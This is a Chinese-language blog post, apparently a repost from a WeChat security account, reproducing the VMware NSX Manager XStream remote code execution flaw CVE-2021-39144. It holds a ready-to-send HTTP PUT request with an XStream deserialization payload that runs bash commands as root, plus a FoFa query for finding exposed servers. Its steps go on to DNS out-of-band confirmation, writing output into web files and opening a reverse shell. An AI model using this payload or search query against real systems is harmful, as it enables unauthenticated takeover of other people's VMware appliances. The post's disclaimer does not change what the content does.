VMware NSX Manager XStream 远程代码执行漏洞(CVE-2021-39144)
2022-12-8 11:5:5 Author: 玄魂工作室(查看原文) 阅读量:38 收藏

免责声明

本公众号仅用于技术交流与学习,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号只是知识的搬运工,取之于民用之于民。

简介

由于在 VMware Cloud Foundation (NSX-V) 中使用 XStream 进行序列化而未经身份验证,黑客可以构造恶意数据包从而造成远程代码执行漏洞。VMware Cloud Foundation 3.x 和更具体的 NSX Manager Data Center for vSphere 6.4.13 及更高版本容易受到远程命令执行的攻击。利用该漏洞可获得 root 权限。
FoFa语法
title="VMware Appliance Management"
漏洞复现

访问VMware Appliance Management页面,如图

使用下面Poc进行命令执行测试:

PUT /api/2.0/services/usermgmt/password/abc HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Connection: closeContent-Type: application/xmlContent-Length: 546
<sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>bash</string> <string>-c</string> <string>cmd</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </sorted-set>
使用DNS外带测试命令执行,返回400,如图:

查看DNS Log成功获取命令执行结果,如图:

继续探测web路径,尝试通过将命令执行结果写入静态文件,从而回显检测漏洞,如图:

但未获得全部web路径,仅获取到部分web路径:

本地搭建环境找到Web路径。通过写入静态页面检测漏洞是否存在。

GetShell

直接bash会因为特殊字符无法获得shell。通过base64编码一下即可反弹shell,如图:

Xray Poc

https://t.zsxq.com/08OAm0JQ9


文章来源: http://mp.weixin.qq.com/s?__biz=MzA4NDk5NTYwNw==&mid=2651429607&idx=1&sn=6e861ec947abf2e3250faefdf84a6992&chksm=8423819fb3540889099549a7558b8cc181fc388e83ef90f94bfc43583cd7a8e4a93ab2b91983#rd
如有侵权请联系:admin#unsafe.sh